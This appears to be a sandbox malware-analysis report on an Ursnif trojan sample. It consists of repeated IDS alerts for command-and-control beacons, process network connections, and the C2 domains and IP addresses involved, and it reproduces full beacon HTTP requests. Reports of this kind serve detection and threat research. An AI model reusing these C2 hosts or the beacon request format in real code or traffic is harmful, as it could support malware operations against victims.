            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49815 -> 198.54.117.211:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49819 -> 198.54.117.210:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49817 -> 198.54.117.210:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49817 -> 198.54.117.210:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49847 -> 31.41.46.120:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49847 -> 31.41.46.120:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49848 -> 31.41.46.120:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49850 -> 31.41.46.120:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49850 -> 31.41.46.120:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49849 -> 31.41.46.120:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49851 -> 31.41.46.120:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49851 -> 31.41.46.120:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49854 -> 31.41.46.120:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49856 -> 31.41.46.120:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49856 -> 31.41.46.120:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49855 -> 31.41.46.120:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49857 -> 31.41.46.120:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49857 -> 31.41.46.120:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49861 -> 31.41.46.120:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49861 -> 31.41.46.120:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49858 -> 31.41.46.120:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49859 -> 31.41.46.120:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49862 -> 31.41.46.120:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49864 -> 162.255.119.177:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49864 -> 162.255.119.177:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49866 -> 198.54.117.216:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49866 -> 198.54.117.216:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49867 -> 198.54.117.216:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49867 -> 198.54.117.216:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49868 -> 198.54.117.216:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49868 -> 198.54.117.216:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49869 -> 198.54.117.216:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49869 -> 198.54.117.216:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49870 -> 198.54.117.216:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49870 -> 198.54.117.216:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49871 -> 198.54.117.216:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49871 -> 198.54.117.216:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49872 -> 198.54.117.216:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49872 -> 198.54.117.216:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49879 -> 162.255.119.177:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49879 -> 162.255.119.177:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49880 -> 198.54.117.211:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49880 -> 198.54.117.211:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49882 -> 192.64.119.233:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49882 -> 192.64.119.233:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49883 -> 198.54.117.212:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49883 -> 198.54.117.212:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49884 -> 192.64.119.233:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49884 -> 192.64.119.233:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49885 -> 198.54.117.215:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49885 -> 198.54.117.215:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49886 -> 31.41.46.120:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49886 -> 31.41.46.120:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49887 -> 31.41.46.120:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49887 -> 31.41.46.120:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49888 -> 192.64.119.233:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49889 -> 192.64.119.233:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49890 -> 198.54.117.210:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49891 -> 198.54.117.216:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49894 -> 31.41.46.120:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49894 -> 31.41.46.120:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49895 -> 31.41.46.120:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49895 -> 31.41.46.120:80
            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 31.41.46.120 80Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeDomain query: www.nnnnnn.casa
            Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 162.255.119.177 80Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeDomain query: nnnnnn.casa
            Source: C:\Windows\SysWOW64\regsvr32.exeDomain query: intermedia.bar
            Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 198.54.117.212 80Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeDomain query: nnnnnn.bar
            Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.64.119.233 80Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 198.54.117.215 80Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 198.54.117.216 80Jump to behavior
            Source: Joe Sandbox ViewASN Name: ASRELINKRU ASRELINKRU
            Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
            Source: Joe Sandbox ViewIP Address: 198.54.117.218 198.54.117.218
            Source: Joe Sandbox ViewIP Address: 198.54.117.210 198.54.117.210
            Source: loaddll32.exe, 00000001.00000003.648024255.0000000001167000.00000004.00000001.sdmp, loaddll32.exe, 00000001.00000003.648253117.0000000001167000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000003.349565633.00000000034F1000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000003.648899790.00000000034F2000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000003.460653574.00000000034F2000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000003.565572741.00000000034F2000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000003.648715352.00000000034F2000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.462177448.0000000002794000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.348654283.0000000002793000.00000004.00000001.sdmpString found in binary or memory: http://intermedia.bar
            Source: loaddll32.exe, 00000001.00000002.809814821.0000000001155000.00000004.00000020.sdmpString found in binary or memory: http://intermedia.bar/
            Source: regsvr32.exe, 00000005.00000003.519535406.00000000034F2000.00000004.00000001.sdmpString found in binary or memory: http://intermedia.bar/drew/
            Source: {5307E23B-7AD2-11EC-90E9-ECF4BB862DED}.dat.37.drString found in binary or memory: http://intermedia.bar/drew/69qrrEp29jAiA/GVIxoy3h/ZRI0if101gbT_2Fcb5gsrod/7F17KHpa_2/BUS9AgcQP0bD4Ff
            Source: regsvr32.exe, 00000005.00000002.810669617.00000000034E5000.00000004.00000020.sdmp, regsvr32.exe, 00000005.00000002.810625001.00000000034DC000.00000004.00000020.sdmpString found in binary or memory: http://intermedia.bar/drew/8GCWuTw3vFr_2BaLQHxEj/S2mZ_2Bs1ztZVt4J/tWEHNc4XanBwmnu/I2msIqz_2B6GZdxr2f
            Source: {230EFA08-7AD2-11EC-90E9-ECF4BB862DED}.dat.15.drString found in binary or memory: http://intermedia.bar/drew/AHuA6TotyEkgE/zVHP4orW/8ZyPY4kye4oTIP7K7spF8Z9/AzQVZQntBp/tPbfiBhZz1jY6V1
            Source: {230EFA0C-7AD2-11EC-90E9-ECF4BB862DED}.dat.15.dr, ~DFCD812BE71D10CCC1.TMP.15.drString found in binary or memory: http://intermedia.bar/drew/QIymR1NV/VEHDP0tzxYyfhToi28JN0gN/4iuWFUXiYW/K0CJrXj0tnUEhVH78/U3kVKnzlLrQ
            Source: loaddll32.exe, 00000001.00000002.809447258.00000000010EB000.00000004.00000020.sdmp, loaddll32.exe, 00000001.00000002.809814821.0000000001155000.00000004.00000020.sdmpString found in binary or memory: http://intermedia.bar/drew/QsS2jHAM_/2BwJZccmdp5m9iHVP9BE/Hy_2Bb24NYz6UUYImCo/zrhZsMNoFc_2FvJseSFb87
            Source: {230EFA0A-7AD2-11EC-90E9-ECF4BB862DED}.dat.15.dr, ~DFA8E08E14F77016D9.TMP.15.drString found in binary or memory: http://intermedia.bar/drew/QvhYBaeq_2F6Kr5S5lD/OqLkixN3sRa2UpR8i3hjYq/eJ9NYRqvvouL5/5HWqGU6L/VANwgL_
            Source: {230EFA0E-7AD2-11EC-90E9-ECF4BB862DED}.dat.15.dr, ~DF1843E87D640EF8CE.TMP.15.drString found in binary or memory: http://intermedia.bar/drew/XRuGSIvrh83QGTYBTk/D9D3Vm19e/d5qtxwnIReenmX0dL_2F/z8AEjIs12VaPeEM7Fev/sHz
            Source: ~DF83FDEC42C12270DC.TMP.37.dr, {5307E239-7AD2-11EC-90E9-ECF4BB862DED}.dat.37.drString found in binary or memory: http://intermedia.bar/drew/eOqzQTB_2B/MowPwZPRMG1LVJR9t/fCLL0MMkzzZ7/Xm0aty4DHMK/aZD8fvqKlB4sn5/NqI7
            Source: {5307E23D-7AD2-11EC-90E9-ECF4BB862DED}.dat.37.drString found in binary or memory: http://intermedia.bar/drew/sJjHsvpax4Nzwn6/j_2BIK7xkvvLg0K_2B/rW_2F1MVm/0X2RDVp6mN6jHjHQXHVv/lXgIE5s
            Source: {5307E23F-7AD2-11EC-90E9-ECF4BB862DED}.dat.37.dr, ~DF847B8575778877FD.TMP.37.drString found in binary or memory: http://intermedia.bar/drew/tN_2FPnM2JFaCc33jtc/NPCaV6rrqIxKNKP7n1AR3O/LMe16EhvI_2Bi/SLNSQXLS/EviOTr3
            Source: loaddll32.exe, 00000001.00000002.809814821.0000000001155000.00000004.00000020.sdmpString found in binary or memory: http://intermedia.bar/ws
            Source: loaddll32.exe, 00000001.00000003.691476910.0000000001167000.00000004.00000001.sdmp, loaddll32.exe, 00000001.00000002.809814821.0000000001155000.00000004.00000020.sdmp, regsvr32.exe, 00000005.00000002.810696201.00000000034ED000.00000004.00000020.sdmp, regsvr32.exe, 00000005.00000003.692543438.00000000034F2000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000003.691905249.00000000034F2000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000003.737248547.00000000034EE000.00000004.00000001.sdmpString found in binary or memory: http://nnnnnn.bar
            Source: loaddll32.exe, 00000001.00000002.809447258.00000000010EB000.00000004.00000020.sdmpString found in binary or memory: http://nnnnnn.bar/.x
            Source: ~DFD962CE55E98449E3.TMP.44.dr, {61A0A539-7AD2-11EC-90E9-ECF4BB862DED}.dat.44.drString found in binary or memory: http://nnnnnn.bar/drew/5fbE1WfgCMBb3Lbm27/FrQeHzQMl/dSHY390GafNfv3DHsOxN/_2BRIsFAVWyz2Wu2_2B/16eM0bg
            Source: loaddll32.exe, 00000001.00000002.810955675.000000000320B000.00000004.00000010.sdmpString found in binary or memory: http://nnnnnn.bar/drew/7DgipjE3bmmbRPyMp6s7/BgNwib2SV4cWPRKen15/S3RnGOSvPDrV_2BWCH8
            Source: loaddll32.exe, 00000001.00000002.809814821.0000000001155000.00000004.00000020.sdmpString found in binary or memory: http://nnnnnn.bar/drew/7DgipjE3bmmbRPyMp6s7/BgNwib2SV4cWPRKen15/S3RnGOSvPDrV_2BWCH85t5/rAG3EMntvxQhd
            Source: loaddll32.exe, 00000001.00000002.809447258.00000000010EB000.00000004.00000020.sdmp, ~DF7A63264CD3C88DE7.TMP.44.dr, {61A0A53D-7AD2-11EC-90E9-ECF4BB862DED}.dat.44.drString found in binary or memory: http://nnnnnn.bar/drew/9KR1ePshh/VJe94rsZSf9_2B1_2Bzi/ojZaK0dpGSZRsGSTBXN/nAjWHF9ja2uIeAiO3gdvCi/301
            Source: ~DF80E3D54E28E527BE.TMP.44.dr, {61A0A53B-7AD2-11EC-90E9-ECF4BB862DED}.dat.44.drString found in binary or memory: http://nnnnnn.bar/drew/SAsRWWRcgAYbX5O/sPIUsFF8_2Fn2uMxzA/aS_2B1MFO/_2B9vtqo1M2_2FHU754_/2FIz_2FEDBV
            Source: {61A0A53F-7AD2-11EC-90E9-ECF4BB862DED}.dat.44.dr, ~DF92A2674FCB111FAD.TMP.44.drString found in binary or memory: http://nnnnnn.bar/drew/knqRZpNvqk/sE_2FZx8OMLhPewzq/M4XZQB_2BkD8/vtpmyt2M_2F/KpLyILSZIke280/Mu0dWeXe
            Source: regsvr32.exe, 00000005.00000002.811766322.0000000004F6B000.00000004.00000010.sdmpString found in binary or memory: http://nnnnnn.bar/drew/pgrqzdCpp_2BoR9YKjM/4PKdL3no8Cmh2eLar0r1e3/w1sLhdA1An4Ma/aD5
            Source: {3EF5FA38-7AD2-11EC-90E9-ECF4BB862DED}.dat.29.drString found in binary or memory: http://nnnnnn.casa/drew/CC6vFhlW/UuVttcLu_2BA_2FHtMOxPk2/p06phiAIxA/gjdrBk68bYot5XSac/3ntrXmBRPVVJ/F
            Source: {3EF5FA36-7AD2-11EC-90E9-ECF4BB862DED}.dat.29.drString found in binary or memory: http://nnnnnn.casa/drew/_2B03VnehjE70sxbkc/jyrt4kETn/GIT8yZh3IbCxiT_2Foqi/AVmT8sl3RBATNe233tn/ZpXwd5
            Source: loaddll32.exe, 00000001.00000002.809730294.0000000001142000.00000004.00000020.sdmpString found in binary or memory: http://nnnnnn.casa/drew/c0nPYFX4zb59h_2F/qctVP12WCFNRJoO/0H9NzUZripQLxYTbGd/R62DjUJbv/AkTvnBTIOP0gGd
            Source: {3EF5FA3C-7AD2-11EC-90E9-ECF4BB862DED}.dat.29.drString found in binary or memory: http://nnnnnn.casa/drew/cfAdMgmKkin/IKg5kEzUc7O41G/1aJXhaeTcJcKRLHZeVFTR/YESrHc56nHRZVmx4/tYxP0kNt3J
            Source: {3EF5FA3A-7AD2-11EC-90E9-ECF4BB862DED}.dat.29.dr, ~DF1DF67103C7B135B0.TMP.29.drString found in binary or memory: http://nnnnnn.casa/drew/y8OOHzBXx4vT2Ja_/2BB0Liu_2F2FEpI/O7IlC7aNtEnJlyf21V/jvmc9z_2B/LgRR93FX60U2LA
            Source: loaddll32.exe, 00000001.00000002.809730294.0000000001142000.00000004.00000020.sdmpString found in binary or memory: http://www.nnnnnn.casa/
            Source: loaddll32.exe, 00000001.00000002.809814821.0000000001155000.00000004.00000020.sdmpString found in binary or memory: http://www.nnnnnn.casa/drew/c0nPYFX4zb59h_2F/qctVP12WCFNRJoO/0H9NzUZripQLxYTbGd/R62DjUJbv/AkTvnBTIOP
            Source: regsvr32.exe, 00000005.00000002.810669617.00000000034E5000.00000004.00000020.sdmpString found in binary or memory: http://www.nnnnnn.casa/drew/kntGHlOf6y1l7K/kCTU1frsUdQxnhn_2Fego/mw6bJXLxnfIRL2cj/FrdUucpG93hhEy_/2F
            Source: unknownDNS traffic detected: queries for: intermedia.bar
            Source: global trafficHTTP traffic detected: GET /drew/AHuA6TotyEkgE/zVHP4orW/8ZyPY4kye4oTIP7K7spF8Z9/AzQVZQntBp/tPbfiBhZz1jY6V1X4/X3paMFGt7Rtb/Gt0dLluCvH5/isi1V1iV9bVleO/ZSGFxB9026a2AgTqikOVK/u0I_2FkyTPhzae4E/1G0e1neGkHRRAKR/dF6sfHEo8IqgOHnhhJ/mLAA5W_2B/LYdzOxqVD56rhjE9w2zj/4EWbKl1xgm4daCyR1mC/ReRKxfnNjlWG/r.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: intermedia.barConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /drew/AHuA6TotyEkgE/zVHP4orW/8ZyPY4kye4oTIP7K7spF8Z9/AzQVZQntBp/tPbfiBhZz1jY6V1X4/X3paMFGt7Rtb/Gt0dLluCvH5/isi1V1iV9bVleO/ZSGFxB9026a2AgTqikOVK/u0I_2FkyTPhzae4E/1G0e1neGkHRRAKR/dF6sfHEo8IqgOHnhhJ/mLAA5W_2B/LYdzOxqVD56rhjE9w2zj/4EWbKl1xgm4daCyR1mC/ReRKxfnNjlWG/r.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: intermedia.barConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /drew/AHuA6TotyEkgE/zVHP4orW/8ZyPY4kye4oTIP7K7spF8Z9/AzQVZQntBp/tPbfiBhZz1jY6V1X4/X3paMFGt7Rtb/Gt0dLluCvH5/isi1V1iV9bVleO/ZSGFxB9026a2AgTqikOVK/u0I_2FkyTPhzae4E/1G0e1neGkHRRAKR/dF6sfHEo8IqgOHnhhJ/mLAA5W_2B/LYdzOxqVD56rhjE9w2zj/4EWbKl1xgm4daCyR1mC/ReRKxfnNjlWG/r.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: intermedia.barConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /drew/AHuA6TotyEkgE/zVHP4orW/8ZyPY4kye4oTIP7K7spF8Z9/AzQVZQntBp/tPbfiBhZz1jY6V1X4/X3paMFGt7Rtb/Gt0dLluCvH5/isi1V1iV9bVleO/ZSGFxB9026a2AgTqikOVK/u0I_2FkyTPhzae4E/1G0e1neGkHRRAKR/dF6sfHEo8IqgOHnhhJ/mLAA5W_2B/LYdzOxqVD56rhjE9w2zj/4EWbKl1xgm4daCyR1mC/ReRKxfnNjlWG/r.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: intermedia.barConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /drew/AHuA6TotyEkgE/zVHP4orW/8ZyPY4kye4oTIP7K7spF8Z9/AzQVZQntBp/tPbfiBhZz1jY6V1X4/X3paMFGt7Rtb/Gt0dLluCvH5/isi1V1iV9bVleO/ZSGFxB9026a2AgTqikOVK/u0I_2FkyTPhzae4E/1G0e1neGkHRRAKR/dF6sfHEo8IqgOHnhhJ/mLAA5W_2B/LYdzOxqVD56rhjE9w2zj/4EWbKl1xgm4daCyR1mC/ReRKxfnNjlWG/r.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: intermedia.barConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /drew/AHuA6TotyEkgE/zVHP4orW/8ZyPY4kye4oTIP7K7spF8Z9/AzQVZQntBp/tPbfiBhZz1jY6V1X4/X3paMFGt7Rtb/Gt0dLluCvH5/isi1V1iV9bVleO/ZSGFxB9026a2AgTqikOVK/u0I_2FkyTPhzae4E/1G0e1neGkHRRAKR/dF6sfHEo8IqgOHnhhJ/mLAA5W_2B/LYdzOxqVD56rhjE9w2zj/4EWbKl1xgm4daCyR1mC/ReRKxfnNjlWG/r.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: intermedia.barConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /drew/AHuA6TotyEkgE/zVHP4orW/8ZyPY4kye4oTIP7K7spF8Z9/AzQVZQntBp/tPbfiBhZz1jY6V1X4/X3paMFGt7Rtb/Gt0dLluCvH5/isi1V1iV9bVleO/ZSGFxB9026a2AgTqikOVK/u0I_2FkyTPhzae4E/1G0e1neGkHRRAKR/dF6sfHEo8IqgOHnhhJ/mLAA5W_2B/LYdzOxqVD56rhjE9w2zj/4EWbKl1xgm4daCyR1mC/ReRKxfnNjlWG/r.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: intermedia.barConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /drew/QvhYBaeq_2F6Kr5S5lD/OqLkixN3sRa2UpR8i3hjYq/eJ9NYRqvvouL5/5HWqGU6L/VANwgL_2FOanliZpdSkommO/z_2FFnfFWj/XA9wFW7rsFws4V6TO/ECxua93xQfvB/2xJ5KsVMA_2/BJTXWzwMMI1Ry4/bSrLklQhxwLVQio5vEqnT/EuTu1lXMUBYE4EO9/fehTx7dve_2FJwl/oHCMlYRgtjfgvp4PcC/lf7RvC6QF/AJjhNY359JkAlb/_2BCF.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: intermedia.barConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /drew/XRuGSIvrh83QGTYBTk/D9D3Vm19e/d5qtxwnIReenmX0dL_2F/z8AEjIs12VaPeEM7Fev/sHz_2Bx6bKLjtUULCEG0oV/GFai8cinvXLi4/iJJ7udwg/w0syzQHw_2FkzljAekHpIIx/DRVmfhCAjc/ZkwIrTh7UfbfcJWEg/EIPSCrhxM6nj/j9uYJZXC8_2/F6Btih0QBETHvA/LKTtsUnIUQHLFxaNR0li7/dM04PASCBbiQz0aa/qK64_2Bg_2B/VwE.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: intermedia.barConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /drew/QIymR1NV/VEHDP0tzxYyfhToi28JN0gN/4iuWFUXiYW/K0CJrXj0tnUEhVH78/U3kVKnzlLrQT/SmvkeHiBSVF/jSdieAe6QVgPYk/Ls60EE1RdzPENlayPGjHS/AIjKP7dUycBtEyrA/RFerBbxZvrxnd_2/Bc1S7J_2FQDJBAH3dG/kHsLUg6CP/6tr_2F_2FmCAcHtuBxvU/3I9dXvsa3LnrU2f8IF1/dsxBAmQu5x_2BsDF7qQMQs/L_2FeC4tc/dGJ.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: intermedia.barConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /drew/XRuGSIvrh83QGTYBTk/D9D3Vm19e/d5qtxwnIReenmX0dL_2F/z8AEjIs12VaPeEM7Fev/sHz_2Bx6bKLjtUULCEG0oV/GFai8cinvXLi4/iJJ7udwg/w0syzQHw_2FkzljAekHpIIx/DRVmfhCAjc/ZkwIrTh7UfbfcJWEg/EIPSCrhxM6nj/j9uYJZXC8_2/F6Btih0QBETHvA/LKTtsUnIUQHLFxaNR0li7/dM04PASCBbiQz0aa/qK64_2Bg_2B/VwE.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: intermedia.barConnection: Keep-Alive
